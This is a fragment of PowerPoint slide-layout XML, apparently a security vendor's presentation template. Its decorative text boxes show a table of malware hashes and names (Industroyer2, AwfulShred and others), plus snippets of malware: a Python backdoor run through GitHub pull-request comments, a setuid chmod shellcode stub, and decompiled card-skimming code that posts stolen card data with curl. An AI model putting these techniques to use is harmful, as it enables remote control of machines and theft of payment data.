                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D41DB31-71DA-E682-2867-94342D6E38C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6945493" y="1520994"/>
              <a:ext cx="56921" cy="22410"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="39000">
                  <a:schemeClr val="accent4"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent3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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4287" name="TextBox 4286">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35FCF4B1-0C85-815B-5887-88086ACAF68E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10893300" y="4393113"/>
            <a:ext cx="7394700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FD9C17C35A68FC505235E20C6E50C622AED8DEA0	108_100.exe	Win32/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Industroyer.B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	Industroyer2</a:t>
            </a:r>
          </a:p>
          <a:p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6FA04992C0624C7AA3CA80DA6A30E6DE91226A16	zrada.exe	Win32/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Agent.AECG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	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ArguePatch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:alpha val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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9CE1491CE69809F92AE1FE8D4C0783BD1D11FBE7	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pa.pay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	N/A	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TailJump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:alpha val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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0090CB4DE31D2D3BCA55FD4A36859921B5FC5DAE	link.ps1	PowerShell/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HackTool.Agent.AH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	Script which enumerates GPO</a:t>
            </a:r>
          </a:p>
          <a:p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D27D0B9BB57B2BAB881E0EFB97C740B7E81405DF	sc.sh	Linux/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Agent.PC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 trojan	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OrcShred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 (Linux worm)</a:t>
            </a:r>
          </a:p>
          <a:p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3CDBC19BC4F12D8D00B81380F7A2504D08074C15	wobf.sh	Linux/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KillFiles.C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 trojan	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AwfulShred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 (Linux wiper)</a:t>
            </a:r>
          </a:p>
          <a:p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8FC7646FA14667D07E3110FE754F61A78CFDE6BC	wsol.sh	Linux/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KillFiles.B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:alpha val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> trojan	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:alpha val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SoloShred</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:alpha val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4292" name="TextBox 4291">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D26BE1C-64B1-153C-BB7E-8361A6B483EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9653725" y="986407"/>
            <a:ext cx="3973806" cy="3536713"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1815"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="87CFD3">
                  <a:alpha val="15000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="41000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                  <a:alpha val="5000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="8100000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="6350">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="508000">
              <a:srgbClr val="87CFD3">
                <a:alpha val="5000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="508000" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:srgbClr val="004B55">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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def run():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try: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g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Github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("REDACTED")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repo_owner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"REDACTED"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repo_name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"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Mycode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"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repo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g.get_user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repo_owner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).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get_repo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repo_name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base_branch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"main"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branch_name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"share-" + "".join(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genexpr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(range(6)))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head_branch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repo.create_git_ref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(ref="refs/heads/" +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branch_name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, sha=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repo.get_branch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base_branch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).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commit.sha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file_name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"_file.txt"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file_content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"This is a readme file."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file_path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branch_name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+ "/" +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file_name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00BBC5">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:endParaRP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commit_message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"file"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repo.create_file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file_path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,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commit_message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,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file_content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, branch=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branch_name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title = "bingo#" + ID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now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datetime.now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body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get_body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pr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repo.create_pull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(title=title, body=body, head=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head_branch.ref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, base=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base_branch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excute_once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[]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while 1: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comments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pr.get_issue_comments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().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get_page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(0)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if comments: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    if comments[-1] not in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excute_once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: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latest_comment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= comments[-1]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excute_once.append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latest_comment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        options =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latest_comment.body.split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        command = options[0]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        if command == "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sh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":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            if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len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(options) &gt; 1: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        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pr.create_issue_comment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("```" + update("".join(options[1:])) + "```")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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00BBC5">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>time.sleep</a:t>
            </a:r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(10)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except Exception as e:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>        print(e)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099EC0-8145-DA75-14C4-C89864B05CAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11952702" y="5467053"/>
            <a:ext cx="2614912" cy="3810613"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1815"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="87CFD3">
                  <a:alpha val="15000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="41000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                  <a:alpha val="5000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="8100000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="6350">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="508000">
              <a:srgbClr val="87CFD3">
                <a:alpha val="5000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="508000" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:srgbClr val="004B55">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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exploit_payload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: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push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rdi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             ; DATA XREF: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main+CE'o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push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rsi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             ; main+11F'o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push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rax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xor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rax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,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rax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call    loc_6022F9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; -------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p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aUsrBinPerl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db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'/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usr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/bin/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perl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', 0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; -------------------------------------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loc_6022F9:                       ; CODE XREF: LOAD:00000000006022E61p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pop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rdi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mov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rsi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,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rax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mov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si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, 4755o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mov     al,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SYS_chmod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syscall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                     ; LINUX -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pop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rax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pop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rsi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pop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rdi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nop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nop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nop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nop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nop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nop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nop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jmp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rcx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="87CFD3">
                  <a:alpha val="50000"/>
                </a:srgb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BE150-6B94-6BD2-9FE2-B17D3402DD00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14946133" y="2675338"/>
            <a:ext cx="5060954" cy="7257711"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1815"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="87CFD3">
                  <a:alpha val="15000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="41000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                  <a:alpha val="5000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="8100000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="6350">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="508000">
              <a:srgbClr val="87CFD3">
                <a:alpha val="5000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="508000" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:srgbClr val="004B55">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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130    act =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x_card_num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=");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131    v43 = 1;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132    if (!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"CVV2="))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133    {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134        v34 =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strcasestr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"cvv2=");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135        v35 = n;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136        if (v34 || (v43 == act != 0LL, v36 =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strcasestr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cvv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="), v35 = n, v36))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137        {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138            v11[v35 - 5] = 120;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139            v43 = 1;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140            v20 = *(const char **)(a1 + 1736);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141        }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142    }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143    if (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strcasestr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cardnum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") ||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strcasestr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ccnumber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"))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144    {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145        v11[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strlen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(v11) - 5] = 120;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146        v20 = *(const char **)(a1 + 1736);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147        v43 = 1;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148    }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149    if (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strcasestr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card_num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") ||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strcasestr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cc_number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"))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150    {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151        v11[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strlen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(v11) - 5] = 120;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152        v20 = *(const char **)(a1 + 1736);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153        v43 = 1;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154    }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155    if (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strcasestr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"card-num") || (v33 =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strcasestr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(v20, "cc-number"), v22 = v43, v33))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156    {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157        v21 =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strlen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(v11);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158        v22 = 1;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159        v11[v21 - 5] = 120;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160        v43 = 1;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161    }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162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na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 = v22;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163    v23 =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curl_easy_init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164    if (v23 &amp;&amp;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na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)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165    {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166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strcpy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(v17, "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mkky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=13378;");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167        v27 = *(_QWORD *)(a1 + 1752);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168        v28 = 16368LL;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169        if (v27 &lt; 16368)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170            v28 = (int)v27;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171        ne = v28;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172        v29 =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strlen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(v17);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173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memcpy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(&amp;v17[v29], *(const void **)(a1 + 1736), ne);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174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CURLOPT_URL, (_DWORD)v11);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175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CURLOPT_WRITEFUNCTION, (unsigned int)sub_2E6F0);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176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CURLOPT_SSL_VERIFYPEER, 0);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177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CURLOPT_SSL_VERIFYHOST, 0);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178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CURLOPT_WRITEDATA, (unsigned int)&amp;v48);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>179        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>curl_easy_setopt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(v23, CURLOPT_USERAGENT, (unsigned int)"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>BigBadWolf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>");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180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CURLOPT_CONNECTTIMEOUT, 2);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181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CURLOPT_TIMEOUT, 3);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182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CURLOPT_POST, 1);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183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CURLOPT_POSTFIELDS, (_DWORD)v17);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184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curl_easy_setopt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(v23, CURLOPT_NOSIGNAL, 1);</a:t>
            </a:r>
          </a:p>
          <a:p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185        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="87CFD3">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>curl_multi_add_handle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(v9, v23);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="!!LIGHT-CRIMSON">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3539950C-6C6E-4886-EE46-FC6D920FE4AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5531348" y="-14550864"/>
            <a:ext cx="30595660" cy="30595660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69000">
                <a:schemeClr val="accent4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0" name="!!SHAPE">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69981505-D3DA-5160-7E94-4195B44B7B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10273008" y="-1086525"/>
            <a:ext cx="20014372" cy="15151006"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 5937728 w 6691457"/>
              <a:gd name="connsiteY0" fmla="*/ 2573648 h 5065475"/>
              <a:gd name="connsiteX1" fmla="*/ 6039311 w 6691457"/>
              <a:gd name="connsiteY1" fmla="*/ 2514974 h 5065475"/>
              <a:gd name="connsiteX2" fmla="*/ 6656049 w 6691457"/>
              <a:gd name="connsiteY2" fmla="*/ 1791550 h 5065475"/>
              <a:gd name="connsiteX3" fmla="*/ 6656144 w 6691457"/>
              <a:gd name="connsiteY3" fmla="*/ 1791169 h 5065475"/>
              <a:gd name="connsiteX4" fmla="*/ 6656144 w 6691457"/>
              <a:gd name="connsiteY4" fmla="*/ 1791169 h 5065475"/>
              <a:gd name="connsiteX5" fmla="*/ 6656239 w 6691457"/>
              <a:gd name="connsiteY5" fmla="*/ 1790788 h 5065475"/>
              <a:gd name="connsiteX6" fmla="*/ 6483728 w 6691457"/>
              <a:gd name="connsiteY6" fmla="*/ 855719 h 5065475"/>
              <a:gd name="connsiteX7" fmla="*/ 6425082 w 6691457"/>
              <a:gd name="connsiteY7" fmla="*/ 754087 h 5065475"/>
              <a:gd name="connsiteX8" fmla="*/ 6366436 w 6691457"/>
              <a:gd name="connsiteY8" fmla="*/ 652455 h 5065475"/>
              <a:gd name="connsiteX9" fmla="*/ 5643355 w 6691457"/>
              <a:gd name="connsiteY9" fmla="*/ 35426 h 5065475"/>
              <a:gd name="connsiteX10" fmla="*/ 5642974 w 6691457"/>
              <a:gd name="connsiteY10" fmla="*/ 35330 h 5065475"/>
              <a:gd name="connsiteX11" fmla="*/ 5642974 w 6691457"/>
              <a:gd name="connsiteY11" fmla="*/ 35330 h 5065475"/>
              <a:gd name="connsiteX12" fmla="*/ 5642593 w 6691457"/>
              <a:gd name="connsiteY12" fmla="*/ 35235 h 5065475"/>
              <a:gd name="connsiteX13" fmla="*/ 4707967 w 6691457"/>
              <a:gd name="connsiteY13" fmla="*/ 207828 h 5065475"/>
              <a:gd name="connsiteX14" fmla="*/ 4606384 w 6691457"/>
              <a:gd name="connsiteY14" fmla="*/ 266502 h 5065475"/>
              <a:gd name="connsiteX15" fmla="*/ 753729 w 6691457"/>
              <a:gd name="connsiteY15" fmla="*/ 2491828 h 5065475"/>
              <a:gd name="connsiteX16" fmla="*/ 652146 w 6691457"/>
              <a:gd name="connsiteY16" fmla="*/ 2550502 h 5065475"/>
              <a:gd name="connsiteX17" fmla="*/ 35409 w 6691457"/>
              <a:gd name="connsiteY17" fmla="*/ 3273926 h 5065475"/>
              <a:gd name="connsiteX18" fmla="*/ 35314 w 6691457"/>
              <a:gd name="connsiteY18" fmla="*/ 3274307 h 5065475"/>
              <a:gd name="connsiteX19" fmla="*/ 35314 w 6691457"/>
              <a:gd name="connsiteY19" fmla="*/ 3274307 h 5065475"/>
              <a:gd name="connsiteX20" fmla="*/ 35218 w 6691457"/>
              <a:gd name="connsiteY20" fmla="*/ 3274688 h 5065475"/>
              <a:gd name="connsiteX21" fmla="*/ 207730 w 6691457"/>
              <a:gd name="connsiteY21" fmla="*/ 4209757 h 5065475"/>
              <a:gd name="connsiteX22" fmla="*/ 266376 w 6691457"/>
              <a:gd name="connsiteY22" fmla="*/ 4311389 h 5065475"/>
              <a:gd name="connsiteX23" fmla="*/ 325022 w 6691457"/>
              <a:gd name="connsiteY23" fmla="*/ 4413021 h 5065475"/>
              <a:gd name="connsiteX24" fmla="*/ 1048103 w 6691457"/>
              <a:gd name="connsiteY24" fmla="*/ 5030050 h 5065475"/>
              <a:gd name="connsiteX25" fmla="*/ 1048483 w 6691457"/>
              <a:gd name="connsiteY25" fmla="*/ 5030145 h 5065475"/>
              <a:gd name="connsiteX26" fmla="*/ 1048483 w 6691457"/>
              <a:gd name="connsiteY26" fmla="*/ 5030145 h 5065475"/>
              <a:gd name="connsiteX27" fmla="*/ 1048864 w 6691457"/>
              <a:gd name="connsiteY27" fmla="*/ 5030240 h 5065475"/>
              <a:gd name="connsiteX28" fmla="*/ 1983490 w 6691457"/>
              <a:gd name="connsiteY28" fmla="*/ 4857648 h 5065475"/>
              <a:gd name="connsiteX29" fmla="*/ 2085074 w 6691457"/>
              <a:gd name="connsiteY29" fmla="*/ 4798974 h 5065475"/>
              <a:gd name="connsiteX30" fmla="*/ 5937633 w 6691457"/>
              <a:gd name="connsiteY30" fmla="*/ 2573648 h 5065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691457" h="5065475">
                <a:moveTo>
                  <a:pt x="5937728" y="2573648"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6039311" y="2514974"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6288463" y="2366669"/>
                  <a:pt x="6555893" y="2165406"/>
                  <a:pt x="6656049" y="1791550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6656049" y="1791455"/>
                  <a:pt x="6656049" y="1791264"/>
                  <a:pt x="6656144" y="1791169"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6656144" y="1791169"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6656144" y="1791169"/>
                  <a:pt x="6656144" y="1790883"/>
                  <a:pt x="6656239" y="1790788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6756394" y="1416836"/>
                  <a:pt x="6625298" y="1108798"/>
                  <a:pt x="6483728" y="855719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6425082" y="754087"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6425082" y="754087"/>
                  <a:pt x="6366436" y="652455"/>
                  <a:pt x="6366436" y="652455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6218202" y="403186"/>
                  <a:pt x="6017034" y="135629"/>
                  <a:pt x="5643355" y="35426"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5643259" y="35426"/>
                  <a:pt x="5643069" y="35426"/>
                  <a:pt x="5642974" y="35330"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5642974" y="35330"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5642974" y="35330"/>
                  <a:pt x="5642688" y="35330"/>
                  <a:pt x="5642593" y="35235"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5268819" y="-64968"/>
                  <a:pt x="4960927" y="66191"/>
                  <a:pt x="4707967" y="207828"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4606384" y="266502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="753729" y="2491828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652146" y="2550502"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="402995" y="2698806"/>
                  <a:pt x="135564" y="2900070"/>
                  <a:pt x="35409" y="3273926"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35409" y="3274021"/>
                  <a:pt x="35409" y="3274212"/>
                  <a:pt x="35314" y="3274307"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35314" y="3274307"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="35314" y="3274307"/>
                  <a:pt x="35314" y="3274592"/>
                  <a:pt x="35218" y="3274688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-64937" y="3648639"/>
                  <a:pt x="66160" y="3956678"/>
                  <a:pt x="207730" y="4209757"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="207730" y="4209757"/>
                  <a:pt x="266376" y="4311389"/>
                  <a:pt x="266376" y="4311389"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="325022" y="4413021"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="473256" y="4662290"/>
                  <a:pt x="674424" y="4929847"/>
                  <a:pt x="1048103" y="5030050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1048198" y="5030050"/>
                  <a:pt x="1048388" y="5030050"/>
                  <a:pt x="1048483" y="5030145"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1048483" y="5030145"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1048483" y="5030145"/>
                  <a:pt x="1048769" y="5030145"/>
                  <a:pt x="1048864" y="5030240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1422638" y="5130444"/>
                  <a:pt x="1730531" y="4999284"/>
                  <a:pt x="1983490" y="4857648"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2085074" y="4798974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5937633" y="2573648"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="19000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
                <a:gs pos="76000">
                  <a:schemeClr val="accent1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:srgbClr val="87CFD3"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="18900000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="1168400">
              <a:schemeClr val="accent1">
                <a:alpha val="7000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="1270000" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1">
                <a:alpha val="54000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-SK" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11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0110DDC5-979D-E03C-7BA4-AD46859404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7454" y="2211861"/>
            <a:ext cx="5795492" cy="2704706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12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CBE9E68-AB81-891D-ED2B-A8D0E73ECF0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16485" y="4016209"/>
            <a:ext cx="10391614" cy="2607014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 1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0FF13757-7702-330B-70C1-53AFB8F51C3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6815" y="866505"/>
            <a:ext cx="8272778" cy="3860834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 1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BB69001A-8748-AC27-0FB4-4D0E1FF6FAB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7826" y="4877898"/>
            <a:ext cx="7834756" cy="7151244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15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0A4C3AF3-2461-1E3A-7766-B3B3A8A8949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alphaModFix amt="50000"/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Blur radius="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27584" y="8159547"/>
            <a:ext cx="5795492" cy="847754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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626E58E5-B601-44FB-3D7C-F245FE85A47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205646" y="1229464"/>
            <a:ext cx="3120056" cy="618632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BF281B37-560D-B024-7CBE-EBD57B2B706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295401" y="8697179"/>
            <a:ext cx="2325914" cy="31012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 userDrawn="1">
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="4079729"/>
            <a:ext cx="10291356" cy="2409250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>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="9600" b="1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Some Presentation Title</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17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5338AF3E-1F0A-23DD-FF25-D821FE2BDFE5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9902" y="3493084"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18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B3A039A7-4100-9B91-8117-E47DC103C73F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artisticBlur radius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0328" y="4750076"/>
            <a:ext cx="5795492" cy="698916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19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17D950D4-48CB-DD7E-877C-092F4201E24F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3426" y="-1681724"/>
            <a:ext cx="13591424" cy="340977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B6CFFC-11B1-3F4F-1B6B-B1C5D6490B25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873198" y="7308130"/>
            <a:ext cx="0" cy="934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F0C773D-EFDB-DA1C-ED18-5F3341480E18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
